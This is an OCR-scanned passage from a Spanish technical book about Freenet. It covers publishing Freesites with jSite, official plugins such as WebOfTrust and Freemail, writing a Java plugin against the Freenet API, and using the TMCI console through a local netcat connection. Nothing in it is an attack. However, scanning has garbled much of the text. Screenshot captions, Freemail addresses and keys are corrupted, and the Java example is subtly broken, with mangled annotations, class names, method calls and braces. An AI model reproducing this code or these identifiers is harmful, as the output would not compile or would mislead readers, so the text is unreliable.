index, htm) 
js/bootstrap.min.js 
js/jquery.min.js 
js/scripts.js 


| Re-scan j 

File Options 
0 Default file 
0 Insert 


Custom key: 


MIME type: |text/html 

h 




Quit 


Imagen 03. II: Visualizacion de los recursos incluidos en el Freesite. 
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Finalmente, cuando se presiona el boton “Insert now ”, se precede a crear el Freesite en Freenet 
con los contenidos del directorio seleccionado. La imagen 03.12 ensena el proceso de creacion del 
servicio y en todo momento permite visualizar el progreso y el timestamp en el que ha comenzado 
el proceso. La insercion del proyecto en la red de Freenet puede ser un proceso lento y dependiendo 
de la cantidad de ficheros que se deben subir puede tardar varios minutos, ya que el modelo de 
enrutamiento y la arquitectura de la red hace que este tipo de actividades sean mucho mas lentas que 
en otros servicios habituales en Internet. 



Imogen 03.12: Proceso de insercion de un Freesite en Freenet. 


Despues de que todos los contenidos del Freesite son insertados en la red, se podra utilizar la clave 
USK generada para poder acceder al servicio oculto en Freenet. En este punto termina el proceso de 
creacion de un Freesite utilizando la herramienta “ Jsite ”, no obstante tambien es posible gestionar 
los Freesites que se han creado anteriormente en la herramienta, pudiendo agregar, modificar o 
eliminar contenidos a Freesites existentes. El directorio “<USER_HOME>/.jSite” es el que contiene 
todos los detalles de configuracion que le permiten a la herramienta mantener un registro de todos 
los sitios que se han ido creando con ‘ jSite ” y dada la simplicidad de la herramienta, no habria 
ningun problema a la hora de copiar y pegar dicho directorio en otro ordenador en el que tambien se 
utilice “jSite” para conservar los detalles de configuracion de los proyectos creados. 

La clave USK generada puede ser utilizada directamente desde la herramienta “FProxy” para 
acceder a los contenidos del servicio recien creado. 


3.3.3 Complementos en Freenet 

Herramientas como jSite y Frost se instalan y ejecutan de forma independiente a Freenet, sin embargo 
algunas aplicaciones se pueden instalar directamente en la instancia como un complemento integrado. 
Todos los complementos en FreeNet son equivalentes a los plugins en I2P, esto se debe a que 
I2P se basa en Freenet y algunas de sus caracteristicas son comunes. Freenet divide dos tipos de 
complementos independientes, por un lado se encuentran los que son soportados oficialmente, 
mientras que hay otros que deben ser instalados de forma manual indicando su correspondiente clave 
de Freenet en el caso de encontrarse alojado en la red de Freenet. A continuacion se explican algunos 
de los complementos mas conocidos comenzado por aquellos que son soportados oficialmente por 
Freenet y que pueden ser cargados de forma directa utilizando “ Fproxy ”. 
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La gestion de complementos en FreeNet se hace desde la aplicacion “ FProxy ” en la opcion de 
“complementos” ubicada en la siguiente ruta: http://127.0.0.1:8888/plugins/ 


V. U ' . 1’ . 


Cargar complemento ofidal: 

Complementos de comunicacibn 

FlogHelper (versibn 34) - Una herramienta Id cl! de usar para la creadbn de un blog en Freenet (flog). Utiliza el complemento WebOfTrust para anundar automaticamente su nuevo 
flog, por lo que debe aparecer en los Indices de freesites. 

Freemail vO1 (jantiguo!) (obsoleto) (versibn 15) - Versibn antigua (vO.1) del correo electrbnico a traves de Freenet. Requiere un diente de coneo (ej. Thundertxrd). La untea razbn 
para instalar esto es si quiere hablar con personas que usan el antiguo Freemail, ya que el nuevo no es compatible. Observe que puede tener ambcs cargados a ia vezya que utflizan 
puertos disbntos para hablar con su cllente de correo. 

Freemail (versibn 26) - Correo electrbnico sobre Freenet. Requiere ei complemento WebOfTrust Tiene una interfaz web bbsica, o puede usar un diente de correo electrbnico- vea la 
Gula para ia interconexibn social de Freenet* (FSNG) para ver detalles sobre cbmo poner esto a punto. 

• WebOfTrust (versibn 15) - Le permits crear una identidad anbnima. Estas identidades pueden confer entre elias, o no. y por tanto evitar el spam y los ataques DoS (de deneoacion 
de servido). Es el armazbn en el que se apoyan chats y aplicadones sodales sobre Freenet. 

Complementos de conectividad 


JSTUN (versibn 2) - Utillza servidores STUN centralizados para detectar su direcdbn IP publica y conectividad. Es importante para Freenet, espedalmente en la darimet (conexiones 
en base a confianza), saber cubl es su direccibn IP (aunque puede iograr obteneria de sus pares, sobre todo si bene una gran cantxlad de cooexiones o esta usando opennet' STUN es 
utilizado por otras aplicaciones, pero este esta centralizado de forma que se podria usar para encontrar su nodo. Si puede utifice UPnP en su lugar, pero si UPnP no puede encontrar su 
direccibn IP de forma fiable, podria ademas cargar tambien esto. 

MDNSDiscovery (versibn 2) - Anunda su nodo Freenet en su red local (LAN) de manera que los dientes pueden conectarse automaticamente a el No se usa mucho en este 
momento. 


SNMP - Le peimite monitorizar de forma remota el estado de su nodo Freenet mediante herramientas como MRTG (graficador de trafico multi router) 

Complementos de ejomplo 


HelloFCP - Complemento de prueba del FCP (protocdo de diente de Freenet). No hace nada ufl, es solo para los desarroiladores de nuevos complementos (plugins). 
HelloWorld - Complemento de prueba. No hace nada util, es solo para desarroiladores de nuevos complementos. 

TestQallery (experimental) (versibn 1) - Complemento de pagina de galena sendUa, no se esta usando. 

Complementos de indexaclbn 


Freereader (versibn 4) - Herramienta para insertar surbdores RSS y ATOM como freesites 

Spider (versibn 52) - Herramienta para crear y subir automaticamente indices de busqueda de freesites en formato nuevo. siguiendo automaticamente los enlaces de sus 
marcadores Produce una carga muy intensa en su nodo Freenet, ,no lo utilice a menos que tenga un equipo potente! Ademas requiere que se cargue ei complemento Library 

Cargar 


Imogen 03.13: Listado de complementos oficiales en Freenet. 


3.3.3.1 Web of Trust (complemento oficial) 

Se trata de un complemento cuyo objetivo es el de crear y gestionar identidades anonimas que 
puedan ser utilizadas como mecanismo de confianza para comunicarse con otros usuarios de Freenet. 
Se trata de un complemento que sirve de apoyo a otros complementos tales como Freemail, FreeTalk 
entre otros, ademas tambien brinda un respaldo adicional contra ataques de denegacion de servicio y 
SPAM. Es un plugin que habitualmente se utiliza en aplicaciones como foros y chats. 

Dado que se trata de un plugin oficialmente soportado por Freenet su instalacion resulta 
bastante simple. En primer lugar, desde la pagina de complementos de la instancia de Freenet 
(http://127.0.0.1:8888/plugins/) se debe seleccionar la aplicacion y posteriormente presionar el 
boton de cargar. Una vez hecho esto, se debe esperar unos instantes a que el complemento se cargue 
correctamente en la instancia. Cuando dicho proceso termina, el complemento aparecera dentro de 
la lista de complementos cargados. 

En el caso de “WebOfTrust", una vez se ha cargado en el nodo de FreeNet, automaticamente 
aparecera una nueva opcion en el menu de la aplicacion “ FProxy ” con el nombre de “ Community ” y 
desde alii se podran realizar las siguientes actividades: 

- Crear una identidad. 

- Editar/Eliminar identidades. 
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- Introduction de identidades en Freenet. 

- Listar Identidades conocidas en la red de Freenet. 


Estas opciones seran utiles como apoyo a otros complementos que se veran a continuation en el 
presente capitulo. 


Web of Trust 

Naveoation Intercambio de ficheros Amigos Conversation Estado Con figuration KevUtils 

Uy Identity 

Known Identities Known anonymous centoes 

Filters and sorting 
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Imogen 03.14: Identidades andnimas conocidas - Complemento Web of Trust. 


33.3.2 Floghelper (complemento oficial) 

En la terminologia de Freenet, un “flog” es un blog que se encuentra alojado al interior de la red. 
El complemento “ Floghelper ” contiene las herramientas necesarias para crear y gestionar flogs. 
Todos los flogs en Freenet requieren una identidad para su creation y posterior manipulation, con 
lo cual nuevamente es necesario utilizar el complemento “ Web Of Trust ” para utilizar una de las 
identidades creadas. Este complemento incluye las funcionalidades basicas para la creation de 
entradas utilizando editores simples, asi como tambien insertar adjuntos y exportar el flog con todos 
sus contenidos. Su funcionamiento es bastante intuitivo, dado que solamente consta de un listado 
con los blogs creados en la instancia local y las acciones que se pueden llevar a cabo sobre cada 
uno de dichos blogs. Las operativas que se encuentran disponibles en el complemento se listan a 
continuation: 

- Administrar entradas (crear, modificar y eliminar) 

- Pre-visualizar el blog. 

- Eliminar/Borrar el blog. 

- Adicionar adjuntos. 

- Exportar el blog. 
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Imogen 03.15: Listado de flogs creados- 

Complemento Floghelper. 




3.3.3.3 Freemail (complemento oficial) 

Este complemento permite que cualquier cliente de correo electronico pueda enviar mensajes de 
forma anonima utilizando Freenet. Del mismo modo que todos los complementos oficiales de Freenet, 
puede ser instalado desde la opcion de “Complementos” ubicada en el menu “Configuracion”. No 
obstante, se trata de un complemento que a la fecha de redactar este documento se encuentra en 
constante desarrollo, por lo tanto es posible encontrar problemas si se instala directamente desde 
FProxy. 

En el caso de encontrar cualquier tipo de error en su uso despues de descargar e instalar la ultima 
version disponible, el usuario tiene la posibilidad de utilizar una version estable desde la siguiente 
ruta: http://downloads.freenetproject.org/alpha/plugins/Freemail/ 

Una vez que el complemento se encuentra cargado en la instancia de Freenet, es obligatorio 
configurar una nueva cuenta de correo que sera utilizada para el envio mensajes de forma anonima, 
para ello se debe seleccionar la opcion “Visite’, con esto se abrira una nueva ventana donde se 
ingresara la information relacionada con dicha cuenta y sus credenciales de acceso. 

Despues de crear la cuenta es necesario configurar un cliente de correo electronico utilizando el 
puerto 3143 para el protocolo IMAP y el puerto 3025 para SMTP. Dicha configuracion es bastante 
sencilla y se encuentra soportada por practicamente todos los clientes de correo electronico. 

La cuenta de correo de Freemail que acaba de crearse tendra el siguiente formato: 

<usuario>@clave.freemail 

Aqui <usuario> es el nombre de usuario que sera necesario para cualquier cliente de correo 
electronico y que permitira identificar la cuenta como valida, la clave es generada automaticamente 
por el complemento. Con estos sencillos pasos se puede configurar cualquier cliente de correo 
electronico utilizando los valores indicados anteriormente. 
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Freemail 


Naveqac&n Community Interoambio de ficheros Amigos Conversaci6n Estado Configuracion 


Responder 

From: Martin Nytus <z»del@b5zswar7ybkmvcrfckIIzSeuw3ifzn5z5m3bz(lgpucb26m2qvsflq.freemail> 
To: adastra@3y6lrk2wA’ddnbqukprqJa5ksarkjnt4bkdtgb66a2pc6eouf2vq (reemail 
Subject: Welcome to Freemail! 

Date: 21-sep-2015 23:1920 

Welcome to Freemail! 


KevUtils FlooHelper Freemail 

Cerrar sesKJn 
Buzon de entrada 
BuzGn de salida 
Nuevo mervsaja 
Acerca de 


Thanks for downloading and testing Freemail. Your new Freemail address is: 
adastra@3y6lrk2wwddnbqukjprqja5ksarkjnj4bkdtgb66a2pc6eouf2vq.freemaii 

There are several places to discuss Freemail. report problems, or ask for help: 

* The Treemair board on FMS 

* The ’ eng. freenet free mail' board on Freetalk 

* The bug tracker https://bugs.freenetproiect.org/ (select 'Freemaif in the top light). 

’ wfreenet on irc.freenode.net 

* The mailing list at httpi/emu.freenetprptect.org/cgi-bin/maHmarvlistinfo/freematl. 

* Send an email to zide»@b5zswai7ybkmvcrfddtz5euw3rfzn5z5m3bzdgpucb26mzqvsflq freemad 

Don’t forget to stay up to date with the Freemail news and latest version at the freesite. which can be found at 

USK@MOd8y6YoLpXOeQGxuCMDg8sE5Yl-Ky6t-GPyy2&'ZO.KIqljAj3-dA1Zf57VDIjkmp3vHUozndpxnH- 

P2RRugl.AQACAAE/freemail/-8/ 

Happy Freemailing! 


Imogen 03.16: Complemento Freemail correctamente instalado en Freenet. 


3.4 Acceso programatico 

Freenet es una solution que se encuentra desarrollada en plataforma Java y cuenta con varias 
altemativas a la hora de crear componentes que se puedan integrar directamente en Freenet o que 
permitan controlar la instancia por medio del envlo de comandos de forma programatica. Por un 
lado, una buena forma de aportar dinamismo a una instancia de Freenet es utilizando la API de 
Freenet para construir complementos y por otro lado, tambien es posible utilizar una interfaz en 
modo texto para interactuar con Freenet sin necesidad de utilizar la herramienta “ Fproxy ”, algo que 
es bastante habitual en sistemas en los que no se encuentra instalado un entomo grafico. 


3.4.1 Desarrollo de complementos en Freenet 

En la red I2P es posible utilizar librerias tales como Streaming Library y BOB cuyo enfoque permite 
la interaction de forma programatica con un nodo de I2P. Tal como se ha mencionado anteriormente, 
en Freenet tambien existe la posibilidad de crear aplicaciones en la forma de complementos para 
ejecutar diferentes tipos de operaciones utilizando Freenet como pasarela. Estos complementos 
pueden contener rutinas de codigo para interactuar directamente con la instancia local de Freenet o 
con otros nodos que se encuentran disponibles en la darknet. 

La API para complementos que se encuentra disponible en Freenet es bastante similar a las librerias 
disponibles en I2P, ya que cuenta con una API en Java bastante completa, aunque desafortunadamente 
con poca documentation disponible, lo cual obliga a investigar la forma en la que se han creado 
otros complementos tales como Thaw o jSite. Ahora se detallan los requisitos necesarios y el 
procedimiento para crear un complemento basico utilizando la API de Freenet y Eclipse IDE. 
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Requisitos 

1. Una instancia de Freenet correctamente instalada y configurada, tal y como se ha visto en las 
primeras secciones del presente capftulo. 

2. Contar con una version del JDK de Java 1.6 o superior: http://www.oracle.com/technetwork/ 
j ava/j avase/overvie w/index. htm 1 

3. Descargar e instalar Apache ANT: http://ant.apache.org/bindownload.cgi 

4. Descargar e instalar GIT: http://git-scm.com/download 

5. Descargar e instalar Eclipse IDE (opcional): http://www.eclipse.org/downloads/ 

Los requerimientos anteriores son utiles para clonar y compilar el proyecto de ejemplo que se 
distribuye en Freenet para el desarrollo de complementos. Dicho proyecto de ejemplo permite 
estudiar el codigo fuente y los principales elementos de la API de Freenet. El proyecto recibe el 
nombre de “Hello WorldPlugin ” y se encuentra alojado en un repositorio en GitHub, el cual se puede 
clonar facilmente con el siguiente comando. 

>git clone git://github.com/freenet/plugin-HelloWorld-staging.git 


Una vez clonado el proyecto, se procede a abrir Eclipse e importar el proyecto existente tal como se 
ensena en la imagen 03.17 



Imogen 03.1 7: Importacion del complemento “plugin-HelloWorld-slaging" en Eclipse IDE. 


Como puede apreciarse, justo despues de importar el proyecto en el Eclipse existen multiples errores 
de compilacion que impiden desplegar el complemento correctamente. El motivo de dichos errores 
es debido a que las librerias necesarias para compilar las clases Java no se encuentran ubicadas 
en el “ classpath ” del entomo, con lo cual es necesario incluirlas en el IDE para que el proceso de 
compilacion funcione correctamente. Dichas dependencias obligatorias corresponden a las clases e 
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interfaces que se encuentran incluidas en los ficheros freenet-stable-latest.jar y freenet-ext.jar, las 
cuales se encuentran ubicadas en el directorio ralz de la instalacion de Freenet. Desde Eclipse se 
pueden incluir estas librerias haciendo click derecho sobre el proyecto y seleccionando “Properties 
—> Java Build Path —> Libraries —> Add External JARs...” tal y como se puede apreciar en la imagen 
03 . 18 . 



Imogen 03.18: Importacion de las dependencias de Freenet para desarrollo de complements. 


Finalmente, se debe generar un fichero ejecutable con extension “.JAR” y para ello, basta con hacer 
click derecho sobre el proyecto y seleccionar “ Export ... —» Java —> JAR File”. El fichero JAR 
generado puede ser desplegado directamente en Freenet utilizando la herramienta “ FProxy 

El proyecto basico que se ha creado anteriormente permite explicar algunos detalles sobre las clasese 
interfaces que se encuentran involucradas y de esta forma se puede entender como es el proceso de 
desarrollo de complementos utilizando la API de Freenet. 

En primer lugar, todos los complementos en Freenet deben implementar la interfaz “freenet. 
pluginmanager.FredPlugin ”, si el fichero JAR que intenta desplegarse en Freenet no contiene una 
clase que implemente dicha interfaz y dicha clase a su vez no es declarada en el fichero “ META- 
INF" de dicho JAR, el complemento no podra ser cargado. Esta puede ser una de las principales 
dificultades con las que se encontrara un desarrollador, ya que el hecho de que una clase implemente 
la interfaz adecuada, no es suficiente para que la instancia de Freenet identifique el fichero “.JAR” 
como un complemento valido. El contenido del siguiente fichero META-INF es un ejemplo util para 
saber exactamente cual es la estructura que se debe declarar para crear y posteriormente cargar un 
complemento en una instancia de Freenet. 
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Manifest-Version: 1.0 

Main-Class: com.thehackerway.PluginHello 
Plugin-Main-Class: com.thehackerway.PluginHello 

Como se puede apreciar, el fichero “META-INF” contiene una linea con el siguiente contenido 
Plugin-Main-Class: AdastraPluginPluginHello. La propiedad “ Plugin-Main-Class” permite 
indicarle a la instancia de Freenet cual es la clase que implementa la interfaz “FredPlugin” y la que 
debe ser procesada como un complemento de Freenet. 

3.4.1.2 Elementos de la API Java de Freenet 

La API de Freenet es bastante extensa e incluye multiples interfaces y clases que pueden ser utilizadas 
para la gestion de complementos e interaccion directa con la instancia de Freenet. A continuation se 
explicara brevemente algunas de las principales interfaces y clases que se encuentran a la disposition 
del desarrollador cuando trabaja con Freenet. 

freenet.pluginmanager.FredPlugin 

Se trata de la interfaz base para todos los complementos que se pueden cargar en Freenet. Define 
unicamente los metodos “ runPlugin ” y “terminate”, cuya firma es la siguiente: 

void runPlugin(PluginRespirator pr); 
void terminate(); 

El primer metodo define la logica que debe ejecutarse cuando el complemento es invocado desde la 
instancia de Freenet y el metodo “ terminate ” simplemente permite definir una rutina de liberacion 
de recursos que se invocara cuando el complemento haya finalizado su ejecucion. En el ejemplo 
indicado anterionnente se ha implementado esta interfaz en la clase “ HelloWorlcT, la cual unicamente 
se encarga de definir un bucle indefinido en el que se escribe en los logs de la instancia de Freenet 
un mensaje de texto piano. Por otro lado, es importante anotar que todos los eventos y logs que se 
registran en una instancia de Freenet son almacenados en el fichero “<FREENET_INSTALLJDIR>/ 
xvrapper.log”. 

freenet.pluginmanager.Toadlet 

Se trata de una clase que se basa completamente en la especificacion de la Servlet API del estandar 
J2EE, pero evidentemente se centra en Freenet. Con esta clase se pueden crear los elementos 
conocidos como “ Toadlets”, que tienen un funcionamiento similar a los Servlets en Java, pero que 
se despliegan directamente en una instancia de Freenet. El uso de estos elementos le permite a los 
complementos incluir funcionalidades que requieren una implementation del tipo cliente/servidor 
utilizando el protocolo HTTP. 

freenet.pluginmanager.FredPluginHTTP 

Se trata de una interfaz que implementa los metodos necesarios para procesar peticiones HTTP desde 
cualquier complemento de Freenet. No obstante es una interfaz poco flexible por lo que se aconseja 
utilizar “ Toadlets” en su lugar, los cuales permiten interactuar con la aplicacion “FProxy”. Los 
metodos implementados en esta interfaz son: “handleHTTPGet” y “handleHTTPPost”, los cuales 
como su nombre indica, permiten procesar peticiones HTTP utilizando los metodos GET y POST. 
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freenet.node.Node 

Esta clase representa toda la information que puede consultarse sobre el nodo local de Freenet 
y realizar diferentes labores de gestion sobre la instancia. Algunas de las actividades que pueden 
Uevarse a cabo con un objeto de esta clase consisten en adicionar o consultar Peers, modificar o 
consultar propiedades de la instancia, gestionar el DataStore del nodo local, entre muchas otras 
ventajas. Se trata de una de las clases mas importantes de la API ya que suministra muchlsima 
information que puede ser utilizada para diversos fines. 

freenet.client.HighLevelSimpleClient 

Esta clase permite crear un cliente simple para realizar consultas sobre Freenet, tales como consultar 
valores de configuration y obtener los contenidos asociados a una clave de Freenet especificada. 

freenet.client.F reenetURI 

Se trata de una clase que representa una clave de Freenet y que suele ser utilizada para definir un 
criterio de busqueda en una instancia de la clase “HighLevelSimpleClient”. Un objeto de esta clase 
permite definir cualquiera de los tipos de claves que se han visto en el presente capitulo. 

freenet.client.F etchResult 

Un objeto de esta clase contiene los resultados que ha devuelto Freenet ante una consulta realizada 
con las clases “ HighLevelSimpleClient ” y “FreenetURF. Contiene information sobre los metadatos 
del cliente que ha realizado dicha consulta asi como un array de bytes con el contenido completo 
que ha retomado Freenet. 

3.4.1.3 Creadon de un complemento utilizando la API de Freenet 

En la section anterior se han ensenado las clases principales que se encuentran disponibles en Freenet, 
sin embargo existen muchos mas elementos que suelen ser de uso comun cuando se desarrollan 
complementos que se deben desplegar en Freenet, tal como se ha mencionado anteriormente la 
API de Freenet es muy extensa y cuenta con multiples funcionalidades que desafortunadamente no 
cuentan con una documentation adecuada y en la mayoria de los casos, es necesario investigar su 
funcionamiento por medio del codigo disponible en otros complementos. 

A continuation se incluye un ejemplo del uso de las clases e interfaces explicadas en la section 
anterior, el cual permitira obtener information sobre la instancia de Freenet donde se encuentra 
cargado y ademas, ejecutara una consulta contra un fichero de texto almacenado en Freenet con una 
clave del tipo CHK. 

package plugins.HelloWorld; 

import java.io.ByteArraylnputStream; 

import java.io.IOException; 

import j ava.net.MalformedURLException; 

import freenet.client.FetchException; 

import freenet.client.FetchResult; 

import freenet.client.HighLevelSimpleClient; 

import freenet.keys.FreenetURI; 
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import freenet.node.Node; 
import freenet.node.useralerts.UserAlert; 
import freenet.pluginmanager.FredPlugin; 
import freenet.pluginmanager.PluginRespirator; 

public class HelloWorld implements FredPlugin ( 

/** The plugin respirator. */ 

private PluginRespirator pluginRespirator; 

SOverride 

public void runPlugin(PluginRespirator respirator) { 
this.pluginRespirator = respirator; 

Node node = pluginRespirator.getNode(); 

System.out.println("Startup Time of this node; "+node.startupTime); 
System.out.println("Node Name: "+node.getMyName()); 

System.out.println("Downstream Max Bit Rate "inode.ipDetector.getBand - 
widthlndicator().getDownstreamMaxBitRate()); 

System.out.println("Downstream Max Bit Rate"+node.ipDetector.getBand- 
widthlndicator().getUpstramMaxBitRate()); 

System.out.println("Alerts in this node."); 

UserAlert[] userAlerts = node.clientCore.alerts.getAlerts(); 
for(UserAlert userAlert : userAlerts) { 

System.out.println("Text: "iuserAlert.getText()); 

System.out.println("Priority: "+userAlert.getPriorityClass()); 

) 


System.out.println("Starting Location Manager..."); 
node.lm.start(); 

System.out.println("Location of this Node: "+node.lm.getLocation()); 
System.out.print("Known Locations..."); 

for (Object location : node. lm. getKnownLocations (node. swapldentifier) ) { 
System.out.println("Location: "tlocation); 

} 


HighLevelSimpleClient simpleClient = pluginRespirator.getHLSimple- 

Client () ; 

FreenetURI freeNetURI; 
try { 

freeNetURI = new FreenetURI("CHK@6xW-CwEp5uSpsb7u7pqlQJpfDORfWo5h- 
LlV8pAc6e38,cKBwXQ5ug0sIgPeZUA0O9jv7r816NvY5utOEt4S-zRw,AAIC—8/file.txt"); 

FetchResult result = simpleClient.fetch(freeNetURI); 

System.out.println("Result Returned: "+result.asBucket().getNa- 

me ()) ; 

ByteArraylnputStream bais = new 
ByteArraylnputStream(result.asByteArray()); 
int ch; 

while ( (ch = bais.readO) != -1) { 

System.out.print((char)ch); 

} 

} catch (MalformedURLException e) { 
e.printStackTrace(); 

) catch (FetchException e) { 
e.printStackTrace(); 
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} catch (IOException e) { 
e.printStackTraceO; 

> 

} 

@Override 

public void terminate() { 

System.out.println("Terminating the Plugin... Bye my friend..."); 

} 

> 

El complemento anterior debe ser empaquetado en un fichero con extension “. JAR ” y ademas, 
debe incluir el fichero “ META-INF/MANIFEST.MF ’ con las instrucciones que se han indicado en 
parrafos anteriores. Posteriormente, el fichero “JAR” que se ha generado debe ser cargado en la 
instancia local de Freenet, para ello es necesario dirigirse a la section de complementos ubicada 
en http://l27.0.0.l:8888/plugins/ y una vez alii, ingresar el directorio donde se encuentra el fichero 
en cuestion en el apartado de “Agregar complemento no oficial”. Tal como se puede apreciar, el 
programa anterior crea un complemento muy simple en el que se escribira en el fichero de logs 
varios detalles relacionados con la instancia local de Freenet. Dicho fichero se encuentra ubicado en 
<FREENET_INSTALL_DIR>/wrapper.log> y entre las trazas se podran ver detalles tales como el 
nombre del nodo, detalles sobre su ancho de banda, alertas y la localization del nodo en la red de 
Freenet. Ademas, tambien se obtiene una instancia de la clase “HighLevelSimpleClienF partiendo 
del objeto “ PluginRespirator ” el cual posteriormente es utilizado para consultar una clave CHK 
almacenada en la red de Freenet. 


3.4.2 Text Mode Client Interface (TMCI) 

TMCI es una aplicacion bastante util que se encuentra incluida en cualquier instancia de Freenet 
y que permite que los clientes que no utilizan interfaces XI1 puedan acceder y modificar la 
configuracion de una instancia. Utilizando TMCI es posible subir contenidos y consultar diferentes 
tipos de claves en Freenet, se pueden llevar a cabo las mismas operaciones que se podrian realizar 
desde la herramienta “ Fproxy ”. 

A la fecha de redactar este documento, se trata de una caracterfstica que viene desactivada por 
defecto, sin embargo es muy facil habilitarla, basta simplemente con editar el fichero de configuracion 
de Freenet que se encuentra ubicado en “<FREENET_INSTALL>/freenet.ini”. En dicho fichero se 
deben incluir las siguientes propiedades de configuracion: 

console.enabled=true 
console.directEnabled=true 

Otras propiedades que se encuentran relacionadas con TMCI y que tambien se pueden editar en el 
fichero de configuracion mencionado anteriormente son las siguientes: 

console.ssl false 

console.bindTo 127.0.0.1,0:0:0:0:0:0:0:1 
console.allowedHosts 127.0.0.1,0:0:0:0:0:0:0:1 
console.port 2323 
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Para editar el fichero de configuration maestro de una instancia, el nodo debe encontrarse detemdo, 
ya que en el caso de que se encuentre iniciado, el cambio de dicho fichero de configuracion sera 
detectado por la instancia y posteriormente sera revertido con el fin de evitar inconsistencias, por 
este motivo se debe detener el nodo, a continuation editar el fichero de configuracion y finalmente 
iniciar la instancia normalmente. 

Despues de habilitar la consola TMCI, es posible acceder a ella utilizando cualquier herramienta de 
conectividad contra el puerto “2323”, por ejemplo Netcat, Socat o Telnet. 

>nc -vv 127.0.0.1 2323 

Connection to 127.0.0.1 2323 port [tcp/*] succeeded! 

Trivial Text Mode Client Interface 


Freenet 0.7.5 Build #1470 rbuild01470 
Enter one of the following commands: 

GET:<Freenet key> - Fetch a key 

DUMP:<Freenet key> - Dump metadata for a key 

PUT:\r\n<text, until a . on a line by itself> - Insert the document and return the 
key. 

PUT:<text> - Put a single line of text to a CHK and return the key. 

GETCHK:\r\n<text, until a . on a line by itself> - Get the key that would be re¬ 

turned if the document was inserted. 

GETCHK:<text> - Get the key that would be returned if the line was inserted. 
PUTFILE:<filename> [#<mimetype>] - Put a file from disk. 

GETFILE:<filename> - Fetch a key and put it in a file. If the key includes a filename 
we will use it but we will not overwrite local files. 

GETCHKFILE:<filename> - Get the key that would be returned if we inserted the file. 

PUTDIR:<path>[#<defaultfile>] - Put the entire directory from disk. 

GETCHKDIR: <path>[#<defaultfile>] - Get the key that would be returned if we'd put 
the entire directory from disk. 

MAKESSK - Create an SSK keypair. 

PUTSSK:<insert uri>;<url to redirect to> - Insert an SSK redirect to a xile already 
inserted. 

PUTSSKDIR:<insert uri>#<path>[#<defaultfile>] - Insert an entire directory to an 
SSK. 

PLUGLOAD: - Load plugin, (use "PLUGLOAD:?" for more info) 

PLUGLIST - List all loaded plugins. 

PLUGKILL:<pluginID> - Unload the plugin with the given ID (see PLUGLIST). 

CONNECT: <filename | URL> - see ADDPEER: <filename | URL> below 
CONNECT:\r\n<noderef> - see ADDPEER:\r\n<noderef> below 

DISCONNECT:<ip:port|name> - see REMOVEPEER:<ip:portI name Iidentity> below 
ADDPEER: <filename | URL> - add a peer from its ref in a file/url. 

ADDPEER:\r\n<noderef including an End on a line by itself> - add a peer by ente¬ 
ring a noderef directly. 

DISABLEPEER: <ip:port|name|identity> - disable a peer by providing its ip+port, 
name, or identity 

ENABLEPEER:<ip:portI name Iidentity> - enable a peer by providing its ip+port, name, 
or identity 

SETPEERLISTENONLY :<ip:port|name|identity> - set ListenOnly on a peer by providing 
its ip+port, name, or identity 

UNSETPEERLISTENONLY:<ip:portI name Iidentity> - unset ListenOnly on a peer by provi¬ 
ding its ip+port, name, or identity 
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HAVEPEER: <ip :port I name | identity> - report true/false on having a peer by providing 
its ip+port, name, or identity 

REMOVEPEER:<ip:port|name|identity> - remove a peer by providing its ip+port, name, 
or identity 

PEER:<ip:port I name Iidentity> - report the noderef of a peer (without metadata) by 
providing its ip+port, name, or identity 

PEERWMD:<ip:port|name|identity> - report the noderef of a peer (with metadata) by 
providing its ip+port, name, or identity 

PEERS - report tab delimited list of peers with name, ip+port, identity, location, 

status and idle time in seconds 

NAME:<new node name> - change the node's name. 

UPDATE ask the node to self-update if possible. 

FILTER: \r\n<text, until a . on a line by itself> - output the content as it re¬ 
turns from the content filter 

STATUS - display some status information on the node including its reference and 
connections. 

MEMSTAT - display some memory usage related informations. 

SHUTDOWN - exit the program 

ANNOUNCE [ :<location>] - announce to the specified location 
RESTART - restart the program 
QUIT - close the socket 
TMCI> 

Como se puede apreciar, al realizar una conexion contra el puerto “2323”, se abre una consola con 
TMCI y un listado con todos los comandos que se encuentran disponibles en dicha consola. 

3.4.2.1 Tipos de comandos en TMCI 

Los comandos disponibles en TMCI se encuentran divididos en diferentes categorias dependiendo 
de sus funcionalidades. En primer lugar, estan aquellos que permiten conocer el comportamiento de 
la instancia y su configuracion general, luego se encuentran los que permiten la interaction directa 
con la instancia de Freenet, del mismo modo que se ha explicado a lo largo de este capitulo con el 
uso de la herramienta “ FProxy ”. Utilizar estos comandos no es demasiado complejo, solamente 
es necesario indicar el comando y argumentos admitidos en el caso de que sean obligatorios. A 
continuation explica el uso de algunos de estos comandos y su funcionamiento general. 

Comandos para la gestion de la instancia local 

Se trata de comandos que permiten conocer los valores de configuracion establecidos en la instancia. 
Algunos de los mas interesantes se listan a continuation: 

RESTART 

Permite reiniciar la instancia local. 

SHUTDOWN 

Permite detener la instancia local. 

UPDATE 

Se encarga de actualizar la instancia local a la ultima version disponible. 
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MEMSTAT 

Permite conocer los diferentes segmentos de memoria utilizados por la instancia (memoria utilizada 
por el proceso de la maquina virtual de Java), ademas de algunas otras propiedades sobre el ordenador 
donde se ejecuta. 

TMCI> MEMSTAT 

Used Java memory: 286 MiB 

Allocated Java memory: 312 MiB 

Maximum Java memory: 455 MiB 

Running threads: 235 

Available CPUs: 8 

Java Version: 1.7.0_80 

JVM Vendor: Oracle Corporation 

JVM Version: 1.7.0_80 

OS Name: Linux 

OS Version: 3.13.0-63-generic 
OS Architecture: amd64 

STATUS 

Ensena el estado actual de la instancia de Freenet en ejecucion. 

TMCI> STATUS 
DARKNET: 
opennet=false 

identity=iPniNLyHwOwPxyk6WrkVPDNOIEICPHprgRW2SlFQkxo 
location=0.3945243590629983 

myName=Freenet node with no name #-8423299802773746004 
lastGoodVersion=Fred, 0.7,1.0,1466 

NAME 

Establece un nombre al nodo. 

TMCI> NAME: ADASTRA 

Node name currently: Freenet node with no name #-8423299802773746004New name: 
ADASTRA 

Comandos para la gestion de conexiones con otros nodos. 

Los comandos de este tipo permiten gestionar las conexiones que la instancia local tiene establecidas 
con otros integrantes en la red. 

PEERS 

Retoma un listado con cada una de las conexiones con su correspondiente nombre, ip+puerto, 
identidad, localizacion, estatus y tiempo de inactividad. 

TMCI> PEERS 

100.3.138.45:32187 hD2Kp4UXvlDyvU3~X5Q~LNnDb2a5yjHSEnCsoyQdikA 
0.7048383443176475 CONNECTED 2 

115.188.6.77:63979 1J985kABRX-p4j 5MR9-oK~Rdx4y5JOymSE9VBimHDKc 

0.42168963692735884 CONNECTED 0 

